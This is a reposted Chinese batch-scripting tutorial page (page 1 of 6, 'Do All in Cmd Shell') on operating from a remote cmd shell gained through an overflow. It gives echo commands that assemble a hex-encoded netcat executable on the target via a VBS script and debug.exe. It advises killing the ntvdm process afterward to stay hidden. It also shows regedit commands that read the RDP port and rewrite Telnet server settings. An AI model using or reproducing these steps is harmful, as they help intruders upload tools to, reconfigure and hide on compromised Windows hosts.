Do All in Cmd Shell一切在命令行下完成第1/6页
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
| D6F64652E0D0D0A2400000000000000"_>>debug.vbs @echo+"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs @echo+"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs @echo+"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs ………… …………(省略若干行) ………… @echo+"">>debug.vbs @echowithwscript.stdout:r=vbcrlf:fori=1tolen(str)step48:.write"e"+hex(256+(i-1)/2):forj=itoi+46step2:.write""+mid(str,j,2):next:.writer:next>>debug.vbs @echo.write"rbx"+r+"0"+r+"rcx"+r+"E800"+r+"ndebug.tmp"+r+"w"+r+"q"+r:endwith>>debug.vbs&&cscript//nologodebug.vbs|debug.exe>nul&&rendebug.tmp"NC.EXE"&deldebug.vbs 全选-》复制-》切换到远程命令行窗口-》粘贴。 如果网速不是很慢的话,整个上传过程大约需要20秒。 几点说明: 1,大的文件传输不稳定,可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。 2,在传输大文件前,可以先传个小的文件作为"热身",让16位虚拟机ntvdm.exe驻留后台。所有文件传完后,为隐蔽起见,应该把ntvdm进程杀掉。 3,某些cmdshell每个命令都需要附加两个回车,那nc.exe.bat就不能直接用了。 4,单个命令的长度是有限的,所以不能只用一个echo完成全部任务。而且,对于nc提供的cmdshell,稍长一些的命令竟然会使shell自动退出(溢出了?)。你可以修改"imod128=0"语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。 5,解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量(因为压缩了数据)。如果有时间,我会写一个更完善的脚本,加强数据压缩能力,增加数据校验功能。 能上传文件当然一切都好办了,但很多x作用Windows自带的工具更方便。在你到处寻找需要的工具时,不要忘了Windows本身。 系统配置 这节包括三方面内容:注册表、服务和组策略。 先说注册表。很多命令行下访问注册表的工具都是交互式的,溢出产生的shell一般不能再次重定向输入/输出流,所以无法使用。 好在系统自带的regedit.exe足够用了。 1,读取注册表 先将想查询的注册表项导出,再用type查看,比如: C:\>regedit/e1.reg"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" C:\>type1.reg|find"PortNumber" "PortNumber"=dword:00000d3d C:\>del1.reg 所以终端服务的端口是3389(十六进制d3d) 2,修改/删除注册表项 先echo一个reg文件,然后导入,比如: echoWindowsRegistryEditorVersion5.00>1.reg echo.>>1.reg echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>1.reg echo"TelnetPort"=dword:00000913>>1.reg echo"NTLM"=dword:00000001>>1.reg echo.>>1.reg regedit/s1.reg |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 批处理的api WMIC学习体会有感第1/2页下一篇: 关于echo 的问题与使用说明
关于Do All in Cmd Shell一切在命令行下完成第1/6页的所有评论
